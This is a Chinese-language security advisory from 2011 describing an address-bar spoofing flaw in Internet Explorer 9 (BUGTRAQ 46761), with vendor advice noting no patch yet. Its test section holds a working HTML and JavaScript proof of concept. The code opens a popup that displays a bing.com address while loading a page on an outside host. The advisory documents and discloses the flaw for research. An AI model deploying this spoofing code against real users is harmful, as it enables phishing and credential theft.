发布日期：2011-03-05
更新日期：2011-03-05

受影响系统：

Microsoft Internet Explorer 9

描述：

---

BUGTRAQ  ID: 46761

Internet Explorer，简称IE，是微软公司推出的一款网页浏览器。Internet Explorer，简称IE或MSIE，是微软公司推出的一款网页浏览器。

IE 9 在实现上存在地址栏欺骗漏洞，远程攻击者可能利用此漏洞执行网络钓鱼攻击。

更新弹出窗口地址栏字段时存在错误，导致加载恶意网页并使地址栏显示一部分地址，欺骗用户信任。

<*来源：cyber flash
  
  链接：http://marc.info/?l=full-disclosure&m=129938461113776&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

cyber flash （）提供了如下测试方法：


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="REFRESH" content="10;url=http://www.keyloggeronline.com/index.php">
<title>Spoof</title>
<script>
function myOpen() {
    var mywin=open('about:blank',"mywindow",'location=1,scrollbars=0,width=300,height= \
290');  mywin.location.href="http://www.keyloggeronline.com/misc/temp/a.php?http://www \
.bing.com/"+Array(5).join(' ')+'&nbsp;';    self.blur();                              \
}
</script>
</head>
<body onclick="myOpen();">
Click anywhere on this page!
</body>
</html>

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp

浏览次数：2718
严重程度：0（网友投票）